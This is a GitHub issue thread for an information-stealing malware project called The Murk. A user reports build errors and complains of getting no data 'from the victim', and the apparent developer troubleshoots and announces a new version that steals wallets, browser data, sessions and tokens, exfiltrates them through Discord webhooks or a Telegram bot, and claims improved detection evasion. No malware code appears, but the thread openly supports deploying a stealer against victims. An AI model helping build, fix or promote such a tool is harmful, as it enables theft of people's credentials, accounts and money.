### ISSUE TITLE
Issue while building 

### ISSUE THREAD

**Issue by blackb3lt** [Nick-Vinesmoke/The-Murk-stealer#109]
having issues while building The Murk.

1. Should we build the Murk or the Builder?
2. While building the Murk : https://i.postimg.cc/tCTq48yq/Screenshot-2023-12-09-133124-1.png
3.  and while building builder

10950 INFO: Copying icon to EXE
10966 INFO: Copying 0 resources to EXE
10967 INFO: Embedding manifest in EXE
11053 INFO: Appending PKG archive to EXE
11066 INFO: Fixing EXE headers
16848 INFO: Building EXE from EXE-00.toc completed successfully.

C:\Users\Downloads\The-Murk-stealer-master\builder>rmdir /s /q build

C:\Users\Downloads\The-Murk-stealer-master\builder>pause null

A bit confused on which one i should use. After trying with all 3 options, didnt get any information from the victim. xd

great genius piece of soft. appreciated. donations soon deserved.

**Comment by Nick-Vinesmoke** [comment]
As I can see, system can't find the icon for app.

**Comment by Nick-Vinesmoke** [comment]
What version do u use?

**Comment by blackb3lt** [comment]
If you wean version of Murk, im using latest one, downloaded latest today, 9.2.7 if im not mistaken.

**Comment by Nick-Vinesmoke** [comment]
If u can, try to build it manually

**Comment by Nick-Vinesmoke** [comment]
Anyway, wait for a few days. I gonna fully re-write it. And after that, everything should work properly.

**Comment by blackb3lt** [comment]
any directions to build it manually? thanks. waiting for more updates from you.

**Comment by Nick-Vinesmoke** [comment]
everything in [readme](https://github.com/Nick-Vinesmoke/The-Murk-stealer/blob/master/README.md)

**Comment by Nick-Vinesmoke** [comment]
**Meet the new version v9.3.0 of The Murk**
_🔐Powerful multi-platform stealer with a huge pack of grabbed data. Wallets stealer, browsers stealer, sessions stealer, etc. All logs will be sent using Discord webhooks or a telegram bot._

--------------------------------------
```↓changes↓
◦ fixed a big heap of bugs
◦ reduced size
◦ improved performance
◦ improved code readability
◦ changed the sending methods
◦ changed uploading a file method
◦ changed the method of taking tokens
◦ most of the code has been completely rewritten
◦ complete change of basic functions
◦ improved detection protection
◦ improved tamper resistance
◦ and a lot of small changes and fixes
```

--------------------------------------

It doesn't have a builder yet, but can be easily assembled using the instructions in the readme

--------------------------------------
[source code](https://github.com/Nick-Vinesmoke/The-Murk-stealer/tree/master)

--------------------------------------

**Comment by Nick-Vinesmoke** [comment]
try it

**Comment by Nick-Vinesmoke** [comment]
star the repo pls and donate if u want
